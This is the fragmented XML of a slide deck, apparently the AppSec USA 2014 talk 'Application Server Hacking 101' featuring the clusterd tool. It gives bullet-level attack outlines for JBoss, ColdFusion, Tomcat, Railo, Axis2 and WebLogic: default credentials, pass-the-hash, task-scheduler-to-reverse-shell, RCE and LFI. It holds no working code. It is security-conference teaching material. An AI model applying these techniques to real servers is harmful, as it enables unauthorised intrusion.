    <dgm:cxn modelId="{84B57B17-8525-4833-986C-520AFF4141D1}" type="presOf" srcId="{5A98A466-C772-4363-AC5D-A54B686830D1}" destId="{9556810F-4357-4B77-A7B5-AECD2BB47580}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D23A754B-92B4-44B8-ADBB-185B6BB4D631}" type="presOf" srcId="{49E5132A-AC39-479B-B3C9-150F12CF4ACB}" destId="{734E576C-5205-4632-9522-1C4A10231144}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{245582DB-26D4-4421-8201-AF48B52526E7}" type="presOf" srcId="{13C586D7-072A-42F1-A5F3-C9397AD9DC01}" destId="{2665F58F-28C5-4321-8650-E8EDEF9CD62A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4BF5E31F-73A5-46AF-9728-31067B61E18F}" type="presOf" srcId="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" destId="{C9AC502E-29C9-4E34-ACCA-118CD9CB49E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{BD33E8D5-3BC9-4891-B066-D22AA89DC089}" srcId="{F448B081-865F-4479-8A9A-4EA10CC74061}" destId="{BACF0C6F-D906-46C4-990F-9F2ED2443781}" srcOrd="1" destOrd="0" parTransId="{5A98A466-C772-4363-AC5D-A54B686830D1}" sibTransId="{68EE5EE8-05B9-4EC9-92D7-8F0B15FF9DDA}"/>
    <dgm:cxn modelId="{96F80B7D-1300-4BFE-A470-EDAA5A4E46E1}" type="presParOf" srcId="{734E576C-5205-4632-9522-1C4A10231144}" destId="{43723616-C322-4172-B4AE-1A7FC0E3F15D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CF6A0B90-5BBB-4261-B7D8-3927D028A730}" type="presParOf" srcId="{43723616-C322-4172-B4AE-1A7FC0E3F15D}" destId="{C4B55915-DFFC-4572-BB3F-C4E42BB4E24C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D6B07B46-2A2A-420F-A2E8-9447C4F83A5A}" type="presParOf" srcId="{C4B55915-DFFC-4572-BB3F-C4E42BB4E24C}" destId="{D5442B93-493C-409E-9FA2-3727E306FBF6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C1FBAE28-E481-4590-AF4B-3DEE681CF327}" type="presParOf" srcId="{C4B55915-DFFC-4572-BB3F-C4E42BB4E24C}" destId="{8610C459-2B34-408A-9D57-717E43E49071}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{92E5D691-2443-45D9-AF91-CE92276D40DA}" type="presParOf" srcId="{43723616-C322-4172-B4AE-1A7FC0E3F15D}" destId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{88C436FA-1FA7-4FF0-9783-317654F7649C}" type="presParOf" srcId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" destId="{2665F58F-28C5-4321-8650-E8EDEF9CD62A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0424DF6E-E3DD-4874-93D1-2D2310FC7AC2}" type="presParOf" srcId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" destId="{4757894C-81FB-4482-B7B8-C7E2FE063768}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4904FC50-7802-450A-A669-F859A2E6BD57}" type="presParOf" srcId="{4757894C-81FB-4482-B7B8-C7E2FE063768}" destId="{97AC6E11-33D2-42C2-8149-E76310900422}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{AD59E13E-893A-425A-88E4-46BCF51A9D83}" type="presParOf" srcId="{97AC6E11-33D2-42C2-8149-E76310900422}" destId="{4C1ECC2F-B2CC-488A-A754-64DC51CF9CE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{EB118006-EB58-4FA8-9664-F9CE11E349AE}" type="presParOf" srcId="{97AC6E11-33D2-42C2-8149-E76310900422}" destId="{5E1FBD9C-319B-45FC-A33A-7F889177AB5C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A6706D2E-9CF5-41D7-B38B-A88EBBC9A802}" type="presParOf" srcId="{4757894C-81FB-4482-B7B8-C7E2FE063768}" destId="{616D6038-104B-4AD2-9196-DC33CDFCCAED}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8A6D28D9-09F8-41A6-99A7-624E7FD63DD6}" type="presParOf" srcId="{4757894C-81FB-4482-B7B8-C7E2FE063768}" destId="{0DB7E55A-B0FF-4B81-B337-2DF23D1A0447}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6DCD3539-17B4-413C-982F-008C4883B61D}" type="presParOf" srcId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" destId="{9556810F-4357-4B77-A7B5-AECD2BB47580}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2564E20D-93D3-4A2D-84A5-C4569830A403}" type="presParOf" srcId="{DD5C458B-59FE-480A-9886-60CAAFFDC42E}" destId="{1E41D6A1-C600-4FFE-B57C-538657AC9F4A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2C937056-52D3-46AD-81D4-585A0A516E4F}" type="presParOf" srcId="{1E41D6A1-C600-4FFE-B57C-538657AC9F4A}" destId="{25817C01-795D-4A9E-B01C-AEC4265CB180}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0D48A87E-B2E6-4470-8078-785BDC290077}" type="presParOf" srcId="{25817C01-795D-4A9E-B01C-AEC4265CB180}" destId="{5A29BBF1-09D5-4F82-9BDA-02FC488BDB11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3C2FD5F2-06FA-40B9-BC4C-0ED90CED5571}" type="presParOf" srcId="{25817C01-795D-4A9E-B01C-AEC4265CB180}" destId="{C9AC502E-29C9-4E34-ACCA-118CD9CB49E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0360B937-7F9E-49A4-ABF5-66FD7AC01486}" type="presParOf" srcId="{1E41D6A1-C600-4FFE-B57C-538657AC9F4A}" destId="{9BAEF2CA-0434-45B8-B3BF-9F1C3557CBB8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8A9F836A-7F18-4049-8882-8D415AD4F984}" type="presParOf" srcId="{1E41D6A1-C600-4FFE-B57C-538657AC9F4A}" destId="{0C58D920-44C4-451B-90D6-62797E1110EC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4262438D-9FC6-4EDB-94DE-55983BF7CC0F}" type="presParOf" srcId="{43723616-C322-4172-B4AE-1A7FC0E3F15D}" destId="{3AA723FB-39B1-41EF-88C0-82459B8FE25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61E507-5110-4F36-AAE3-549653AD876C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="617219" y="0"/>
          <a:ext cx="6995160" cy="416083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6BAE26-66E2-433B-AEAF-978CB3B8215F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2878" y="1248251"/>
          <a:ext cx="1961478" cy="1664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Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="84124" y="1329497"/>
        <a:ext cx="1798986" cy="1501842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{565CC2F1-C54C-49A7-8D31-D8C2406AA2E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2090333" y="1248251"/>
          <a:ext cx="1961478" cy="1664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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2171579" y="1329497"/>
        <a:ext cx="1798986" cy="1501842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A089CE17-5A6E-4662-8F0C-11F0327D911E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4177787" y="1248251"/>
          <a:ext cx="1961478" cy="1664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Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4259033" y="1329497"/>
        <a:ext cx="1798986" cy="1501842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{72E67A71-9089-49D8-9366-127099EA515D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6265242" y="1248251"/>
          <a:ext cx="1961478" cy="1664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Post-Exploitation</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6346488" y="1329497"/>
        <a:ext cx="1798986" cy="15018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56810F-4357-4B77-A7B5-AECD2BB47580}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2019300" y="2208513"/>
          <a:ext cx="1105056" cy="3835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786"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1105056" y="191786"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1105056" y="38357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65F58F-28C5-4321-8650-E8EDEF9CD62A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="914243" y="2208513"/>
          <a:ext cx="1105056" cy="383573"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1105056" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1105056" y="191786"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="191786"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="38357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442B93-493C-409E-9FA2-3727E306FBF6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1106030" y="1295243"/>
          <a:ext cx="1826539" cy="9132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Kali</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1106030" y="1295243"/>
        <a:ext cx="1826539" cy="913269"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4C1ECC2F-B2CC-488A-A754-64DC51CF9CE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="973" y="2592086"/>
          <a:ext cx="1826539" cy="9132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Target 1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="973" y="2592086"/>
        <a:ext cx="1826539" cy="913269"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A29BBF1-09D5-4F82-9BDA-02FC488BDB11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2211086" y="2592086"/>
          <a:ext cx="1826539" cy="9132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Target 2</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2211086" y="2592086"/>
        <a:ext cx="1826539" cy="9132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759B4E-74A9-4A81-92F4-1E285BED899D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/13/2014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FBCF3-1EAB-4908-9432-20876F41F8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23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"/>
            <a:ext cx="9144000" cy="685799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20000">
                <a:srgbClr val="D6E1EF">
                  <a:alpha val="75000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="57000">
                <a:srgbClr val="95B3D7">
                  <a:alpha val="75000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="83000">
                <a:srgbClr val="4F81BD">
                  <a:alpha val="75000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="00549E">
                  <a:alpha val="75000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
            <a:tileRect/>
          </a:gra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3" r="1818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2"/>
            <a:ext cx="9144000" cy="60635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5943600"/>
            <a:ext cx="1944000" cy="685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457200"/>
            <a:ext cx="2286000" cy="1157517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162300" y="1600200"/>
            <a:ext cx="281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ouseGothicHG23Text" pitchFamily="2" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AppSec USA 2014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ouseGothicHG23Text" pitchFamily="2" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Denver, Colorado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00549E"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="0054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2743200"/>
            <a:ext cx="7315200" cy="914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i="0">
                <a:solidFill>
                  <a:srgbClr val="00549E"/>
                </a:solidFill>
                <a:latin typeface="HouseGothicHG23Text" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Presentation Title]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3840480"/>
            <a:ext cx="7315200" cy="9144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400" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="HouseGothicHG23Text" pitchFamily="2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[Optional Subtitle]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79501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43000"/>
            <a:ext cx="8229600" cy="4800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[Details, details...]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[Slide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56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858001" y="1142999"/>
            <a:ext cx="1828385" cy="182838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 sz="2000" i="1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noProof="0" dirty="0" smtClean="0"/>
              <a:t>[Click icon to add a selfie]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858001" y="3123368"/>
            <a:ext cx="1828800" cy="3056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[Logo caption]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457200" y="1143000"/>
            <a:ext cx="6248400" cy="63976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[Speaker Name]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457200" y="1782762"/>
            <a:ext cx="6248400" cy="416052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[A/S/L?]</a:t>
            </a:r>
            <a:endParaRPr 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858000" y="4114897"/>
            <a:ext cx="1828385" cy="182838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 sz="2000" i="1" baseline="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noProof="0" dirty="0" smtClean="0"/>
              <a:t>[Company branding on this slide only.]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[Introduction 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007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143000"/>
            <a:ext cx="4040188" cy="63976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[Heading]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1782762"/>
            <a:ext cx="4040188" cy="416052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Details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5" y="1143000"/>
            <a:ext cx="4041775" cy="64008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[MOAR HEADING]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45025" y="1782762"/>
            <a:ext cx="4041775" cy="416052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MOAR DETAILS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[Slide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12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142999"/>
            <a:ext cx="4038600" cy="48006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[Details]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143000"/>
            <a:ext cx="4038600" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" baseline="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[MOAR DETAILS]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[Slide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599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43000"/>
            <a:ext cx="5486400" cy="411480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3200" i="1" baseline="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5367338"/>
            <a:ext cx="8229600" cy="5486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aseline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[Caption, citation, etc.]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[Slide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173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0" y="2286000"/>
            <a:ext cx="7315200" cy="1828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[Bold statement!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rhetorical question?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Q &amp; A”, etc.]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[Slide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013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Document 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocument">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0054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440" y="182880"/>
            <a:ext cx="914787" cy="462604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6096000"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0054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 userDrawn="1"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00549E"/>
          </a:solidFill>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="0054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6199292"/>
            <a:ext cx="1219198" cy="430106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543800" y="6199292"/>
            <a:ext cx="146342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5832B563-A216-415E-B06D-0EA1461942FD}" type="slidenum">
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00549E"/>
                </a:solidFill>
                <a:latin typeface="HouseGothicHG23Text" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00549E"/>
              </a:solidFill>
              <a:latin typeface="HouseGothicHG23Text" pitchFamily="2" charset="0"/>
            </a:endParaRPr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137160" y="137160"/>
            <a:ext cx="777240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[Slide Title]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3" r:id="rId4"/>
    <p:sldLayoutId id="2147483652" r:id="rId5"/>
    <p:sldLayoutId id="2147483657" r:id="rId6"/>
    <p:sldLayoutId id="2147483654" r:id="rId7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HouseGothicHG23Text" pitchFamily="2" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="HouseGothicHG23Text" pitchFamily="2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matasano.com/research/OWASP3011_Luca.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hatRiot/clusterd/wiki/JBoss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tRiot/clusterd/wiki/Coldfusion" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikidocs.adobe.com/wiki/display/coldfusionen/Home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tRiot/clusterd/wiki/Tomcat" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tomcat.apache.org/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hatriot.github.io/blog/2014/06/25/railo-security-part-one/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.getrailo.org/index.cfm/documentation/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tRiot/clusterd/wiki/Axis2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://axis.apache.org/axis2/java/core/docs/userguide.html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tRiot/clusterd/wiki/WebLogic" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.oracle.com/technetwork/middleware/weblogic/documentation/index.html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tRiot/clusterd" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hatRiot/clusterd/wiki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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Hacking 101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Featuring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clusterd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87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7924800" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack exposed interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check your versions for known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further Reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.jboss.org/projects/</a:t>
            </a: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github.com/hatRiot/Clusterd/wiki/JBoss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matasano.com/research/OWASP3011_Luca.pdf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JBOSS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1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153400" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hash Retrieval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass-the-Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Task Scheduler to Reverse Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further Reading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wikidocs.adobe.com/wiki/display/coldfusionen/Home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github.com/hatRiot/Clusterd/wiki/Coldfusion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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/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006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7696200" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposed management interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further Reading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tomcat.apache.org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github.com/hatRiot/Clusterd/wiki/Tomcat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Tomcat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16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534400" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote Code Executions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local File Inclusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS reveals many goodies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further reading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.getrailo.org/index.cfm/documentation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http://hatriot.github.io/blog/2014/06/25/railo-security-part-one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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Railo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49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305800" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposed Management interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposed Web Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Creds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further Reading</a:t>
            </a:r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axis.apache.org/axis2/java/core/docs/userguide.html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github.com/hatRiot/Clusterd/wiki/Axis2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Axis2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618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7848600" cy="639762"/>
          </a:xfrm>
        </p:spPr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305800" cy="4160520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposed Administrator Console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No brute force protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Further Reading:</a:t>
            </a:r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www.oracle.com/technetwork/middleware/weblogic/documentation/index.html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github.com/hatRiot/Clusterd/wiki/WebLogic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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/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874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534400" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> methodology</a:t>
            </a:r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89147219"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1782763"/>
          <a:ext cx="8229600" cy="4160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46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Command line tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check the help switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check the GitHub Wiki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github.com/hatRiot/Clusterd/wiki</a:t>
            </a:r>
